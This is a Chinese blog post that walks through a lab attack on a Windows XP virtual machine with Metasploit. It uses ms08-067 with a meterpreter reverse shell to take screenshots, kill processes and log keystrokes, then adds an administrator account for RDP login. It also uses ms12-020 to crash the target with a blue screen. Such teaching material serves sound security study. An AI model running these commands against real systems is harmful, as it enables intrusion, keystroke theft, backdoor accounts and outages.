<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>关于msfconsole的应用 | echozt</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="本篇文章介绍关于msfconsole的一些实例应用，主要是对ms08-067,ms12-020这两个实例的介绍以及应用。">
<meta property="og:type" content="article">
<meta property="og:title" content="关于msfconsole的应用">
<meta property="og:url" content="https://echozt.github.io/posts/5a76.html">
<meta property="og:site_name" content="echozt">
<meta property="og:description" content="本篇文章介绍关于msfconsole的一些实例应用，主要是对ms08-067,ms12-020这两个实例的介绍以及应用。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://echozt.github.io/posts/5a76/1.png">
<meta property="og:image" content="https://echozt.github.io/posts/5a76/2.png">
<meta property="og:image" content="https://echozt.github.io/posts/5a76/3.png">
<meta property="og:image" content="https://echozt.github.io/posts/5a76/4.png">
<meta property="og:image" content="https://echozt.github.io/posts/5a76/5.png">
<meta property="og:image" content="https://echozt.github.io/posts/5a76/6.png">
<meta property="og:image" content="https://echozt.github.io/posts/5a76/7.png">
<meta property="og:image" content="https://echozt.github.io/posts/5a76/8.png">
<meta property="og:image" content="https://echozt.github.io/posts/5a76/9.png">
<meta property="og:image" content="https://echozt.github.io/posts/5a76/10.png">
<meta property="og:image" content="https://echozt.github.io/posts/5a76/11.png">
<meta property="og:image" content="https://echozt.github.io/posts/5a76/12.png">
<meta property="og:image" content="https://echozt.github.io/posts/5a76/13.png">
<meta property="article:published_time" content="2022-01-27T07:00:33.000Z">
<meta property="article:modified_time" content="2022-01-27T14:04:58.314Z">
<meta property="article:author" content="echozt">
<meta property="article:tag" content="渗透">
<meta property="article:tag" content="msfconsole">
<meta property="article:tag" content="攻击">
<meta property="article:tag" content="漏洞">
<meta property="article:tag" content="kali">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://echozt.github.io/posts/5a76/1.png">
  
    <link rel="alternate" href="/atom.xml" title="echozt" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.4.1"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">echozt</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="搜索"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://echozt.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-关于msfconsole的应用" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/posts/5a76.html" class="article-date">
  <time datetime="2022-01-27T07:00:33.000Z" itemprop="datePublished">2022-01-27</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      关于msfconsole的应用
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>本篇文章介绍关于msfconsole的一些实例应用，主要是对ms08-067,ms12-020这两个实例的介绍以及应用。</p>
<span id="more"></span>

<h1 id="实验背景："><a href="#实验背景：" class="headerlink" title="实验背景："></a>实验背景：</h1><p>都是在虚拟机下进行的啦，靶机采用的是winxpens3，确保所用的靶机有相关的漏洞才能攻击成功哦。并且攻击机和靶机要处在同一局域网下才行哒，建议开启仅主机模式哦。还有一点，有些命令无效，可能是因为模式为普通用户模式，在命令前面使用sudo就好了，或者切换为root（su root)</p>
<h1 id="实验环境："><a href="#实验环境：" class="headerlink" title="实验环境："></a>实验环境：</h1><p>攻击机：kali             ip地址：192.168.127.139</p>
<p>靶机：winxpens3    ip地址：192.168.127.138</p>
<h1 id="1、ms08-067（单个攻击）"><a href="#1、ms08-067（单个攻击）" class="headerlink" title="1、ms08-067（单个攻击）"></a>1、ms08-067（单个攻击）</h1><h2 id="1-1配置命令"><a href="#1-1配置命令" class="headerlink" title="1.1配置命令"></a>1.1配置命令</h2><p>首先进入msfconsole界面，</p>
<pre class="line-numbers language-bash"><code class="language-bash">search ms08-067      <span class="token comment" spellcheck="true">#查找ms08-067漏洞</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>可以看到这个漏洞的基本信息：</p>
<img src="/posts/5a76/1.png" class>

<p>可以选择</p>
<pre class="line-numbers language-bash"><code class="language-bash">use 0
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>或者使用如下命令，一样的意思</p>
<pre class="line-numbers language-bash"><code class="language-bash">use exploit/windows/smb/ms08_067_netapi
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>选择之后，发现提示信息，按照提示信息配置：</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token keyword">set</span> payload windows/meterpreter/reverse_tcp
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/5a76/2.png" class>

<p>然后输入</p>
<pre class="line-numbers language-bash"><code class="language-bash">show options
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>查看哪些是yes,即必填,如果它的Current Setting为空，则要对它进行设置，如</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token keyword">set</span> RHOSTS 192.168.127.138     <span class="token comment" spellcheck="true">#设置靶机地址</span>

<span class="token keyword">set</span> LHOST 192.168.127.139      <span class="token comment" spellcheck="true">#设置攻击机地址</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h2 id="1-2运行攻击"><a href="#1-2运行攻击" class="headerlink" title="1.2运行攻击"></a>1.2运行攻击</h2><p>完成前面的配置之后，运行：</p>
<pre class="line-numbers language-bash"><code class="language-bash">run       <span class="token comment" spellcheck="true">#或者使用exploit,来实现攻击</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>成功进入如下界面：</p>
<img src="/posts/5a76/3.png" class>

<h2 id="1-3使用screenshot命令可对靶机界面进行截图："><a href="#1-3使用screenshot命令可对靶机界面进行截图：" class="headerlink" title="1.3使用screenshot命令可对靶机界面进行截图："></a>1.3使用screenshot命令可对靶机界面进行截图：</h2><pre class="line-numbers language-bash"><code class="language-bash">screenshot
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>截图默认保存在/home/kali目录下（命令下面会显示文件保存的路径），进入文件路径可以看到截图。</p>
<img src="/posts/5a76/4.png" class>

<h2 id="1-4查看并关闭靶机打开进程"><a href="#1-4查看并关闭靶机打开进程" class="headerlink" title="1.4查看并关闭靶机打开进程"></a>1.4查看并关闭靶机打开进程</h2><p>可以先使用ps命令查看靶机打开的进程号</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">ps</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>然后可以使用kill关闭靶机的某个进程</p>
<p>比如，靶机此时打开了记事本，我在攻击上使用ps查看的进程号为2516（这个进程号是随机变化的哈），使用如下命令：</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">kill</span> 2516
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>即可关闭通过攻击机关闭靶机的记事本进程</p>
<img src="/posts/5a76/5.png" class>

<h2 id="1-5监听靶机键盘内容"><a href="#1-5监听靶机键盘内容" class="headerlink" title="1.5监听靶机键盘内容"></a>1.5监听靶机键盘内容</h2><p>同样先使用ps查看靶机此时的进程及进程号，得到此时靶机记事本进程为484（靶机已经重新打开记事本进程）</p>
<p>然后使用：</p>
<pre class="line-numbers language-bash"><code class="language-bash">migrate 484        <span class="token comment" spellcheck="true">#484为靶机开启的进程号</span>

keyscan_start      <span class="token comment" spellcheck="true">#开启监听靶机键盘</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>然后在靶机上任意输一些内容，回到kali，然后输入以下命令，即可查看监听到的键盘内容</p>
<pre class="line-numbers language-bash"><code class="language-bash">keyscan_dump       <span class="token comment" spellcheck="true">#得到监听内容</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/5a76/6.png" class>

<h2 id="1-6利用3389端口远程登录靶机"><a href="#1-6利用3389端口远程登录靶机" class="headerlink" title="1.6利用3389端口远程登录靶机"></a>1.6利用3389端口远程登录靶机</h2><p>在Windows上创建一个名称为zt密码为pass的用户，并提升为管理员权限</p>
<pre class="line-numbers language-bash"><code class="language-bash">net user zt pass /add                   <span class="token comment" spellcheck="true">#创建新用户，用户名为zt密码为pass</span>

net localgroup Administrators zt /add   <span class="token comment" spellcheck="true">#将用户加入Administrators组</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>确保靶机的3389端口已经打开，可以在kali上使用nmap扫描靶机地址查看靶机是否开启3389端口。</p>
<pre class="line-numbers language-bash"><code class="language-bash">nmap -F 192.168.127.138            <span class="token comment" spellcheck="true">#查看靶机是否开启3389端口</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/5a76/7.png" class>

<p>发现3389端口已经打开，进入下一步。</p>
<p>接下来重新打开一个终端，输入</p>
<pre class="line-numbers language-bash"><code class="language-bash">rdesktop 192.168.127.138      <span class="token comment" spellcheck="true">#远程登录靶机</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p> 回车后会自动弹出如图所示的登录窗口</p>
<img src="/posts/5a76/8.png" class>

<p>使用创建的账户zt,密码pass即可远程登录靶机</p>
<img src="/posts/5a76/9.png" class>

<h1 id="2、ms12-020（导致对方蓝屏）"><a href="#2、ms12-020（导致对方蓝屏）" class="headerlink" title="2、ms12-020（导致对方蓝屏）"></a>2、ms12-020（导致对方蓝屏）</h1><h2 id="2-1配置命令"><a href="#2-1配置命令" class="headerlink" title="2.1配置命令"></a>2.1配置命令</h2><p>确定靶机的3389端口打开</p>
<p>进入msfconsole，配置如下命令：</p>
<pre class="line-numbers language-bash"><code class="language-bash">search ms12-020   <span class="token comment" spellcheck="true">#查找ms12-020漏洞</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>查看信息，使用如下，这里因为0已经被修复，所以这里只能使用关于1的，不能使用use 0</p>
<img src="/posts/5a76/10.png" class>

<pre class="line-numbers language-bash"><code class="language-bash">use 1
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>或者使用如下，</p>
<pre class="line-numbers language-bash"><code class="language-bash">use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>选择之后，发现提示信息，按照提示信息配置：</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token keyword">set</span> payload linux/x64/meterpreter/reverse_tcp
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/5a76/11.png" class>

<p>然后查看并配置所需命令：</p>
<pre class="line-numbers language-bash"><code class="language-bash">show options

<span class="token keyword">set</span> RHOSTS 192.168.127.138    <span class="token comment" spellcheck="true">#配置靶机地址</span>

<span class="token keyword">set</span> LHOST 192.168.127.139     <span class="token comment" spellcheck="true">#配置攻击机地址</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="2-2运行攻击"><a href="#2-2运行攻击" class="headerlink" title="2.2运行攻击"></a>2.2运行攻击</h2><p>完成前面的配置之后，运行：</p>
<pre class="line-numbers language-bash"><code class="language-bash">run       <span class="token comment" spellcheck="true">#或者使用exploit,来实现攻击</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/5a76/12.png" class>

<p>查看到出现seems down 表示攻击成功，已经致使目标机蓝屏了。</p>
<img src="/posts/5a76/13.png" class>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://echozt.github.io/posts/5a76.html" data-id="ckyy7gesu00039wujbeab84h7" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/kali/" rel="tag">kali</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/msfconsole/" rel="tag">msfconsole</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%94%BB%E5%87%BB/" rel="tag">攻击</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%B8%97%E9%80%8F/" rel="tag">渗透</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E/" rel="tag">漏洞</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/posts/85e6.html" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">hexo + github 搭建博客</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/hexo/" rel="tag">hexo</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/kali/" rel="tag">kali</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/msfconsole/" rel="tag">msfconsole</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%94%BB%E5%87%BB/" rel="tag">攻击</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B8%97%E9%80%8F/" rel="tag">渗透</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E/" rel="tag">漏洞</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签云</h3>
    <div class="widget tagcloud">
      <a href="/tags/hexo/" style="font-size: 10px;">hexo</a> <a href="/tags/kali/" style="font-size: 10px;">kali</a> <a href="/tags/msfconsole/" style="font-size: 10px;">msfconsole</a> <a href="/tags/%E6%94%BB%E5%87%BB/" style="font-size: 10px;">攻击</a> <a href="/tags/%E6%B8%97%E9%80%8F/" style="font-size: 10px;">渗透</a> <a href="/tags/%E6%BC%8F%E6%B4%9E/" style="font-size: 10px;">漏洞</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/01/">一月 2022</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/posts/5a76.html">关于msfconsole的应用</a>
          </li>
        
          <li>
            <a href="/posts/85e6.html">hexo + github 搭建博客</a>
          </li>
        
          <li>
            <a href="/posts/3eeb.html">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2022 echozt<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>